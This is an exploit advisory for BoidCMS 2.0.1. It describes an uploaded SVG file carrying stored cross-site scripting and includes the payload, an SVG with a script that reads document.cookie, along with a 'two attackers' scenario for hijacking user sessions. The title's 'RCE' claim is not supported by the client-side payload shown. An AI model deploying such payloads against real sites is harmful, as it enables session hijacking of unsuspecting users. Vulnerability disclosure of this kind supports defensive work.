## Title: BoidCMS-2.0.1 - FileUpload - RCE - PHPSESSID HIJACKING ## Author: nu11secur1ty ## Date: 10/13/2023 ## Vendor: https://boidcms.github.io/#/ ## Software: https://github.com/BoidCMS/BoidCMS/releases/tag/v2.0.1 ## Reference: https://portswigger.net/web-security/file-upload ## LAB: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload ## Description: This attack needs two attackers to be complete. The first one has credentials and he will be using them to upload a malicious dirty SVG file, when he is ready he just quits the application and he will send the malicious URL to the second attacker. When the second attacker has this URL he can be using it to access EVERY Session of the EVERY user of this system. This will be stopped when the real admin finds this malicious file, but it will be too late for all users of this system. This attack is called TMITM-Two men in the middle! STATUS: HIGH- Vulnerability [+]Exploit: ```svg <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.cookie); </script> </svg> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/boidcms/2023/BoidCMS-2.0.1) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/10/boidcms-201-fileupload-rce-phpsessid.html) ## Time spent: 01:37:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>